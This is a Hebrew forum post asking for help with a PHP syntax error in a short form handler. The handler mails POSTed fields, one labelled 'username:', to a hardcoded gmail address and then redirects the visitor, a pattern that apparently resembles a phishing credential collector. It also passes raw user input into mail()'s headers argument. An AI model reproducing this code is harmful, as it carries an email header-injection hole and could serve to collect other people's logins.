שלום

אני מבקש עזרה בקוד PHP..
הקוד :
PHP קוד:
<?
if(isset($_POST["send_msg"])){
echo '<meta http-equiv="refresh" content="0; url=after.html">
';
//---------------÷áìä î-HTML---------------------
$subject = $_POST["subject"];
$subject2 = $_POST["subject2"];
$nextpage = $_POST["nextpage"];
$emailto = $_POST["emailto"];
//--------ùìéçä------------
$s11 = $nextpage;
$email="2moonspzd@gmail.com";
$subject="username:$subject";
mail($email,$s11,$subject,$subject2);
}
?>
ברגע שאני מריץ אותו אני מקבל את השגיאה הבאה:
Parse error: syntax error, unexpected $end in /www/110mb.com/e/m/a/n/t/i/s/s/emantiss/htdocs/contact.php on line 26
מישו יודע אולי למה?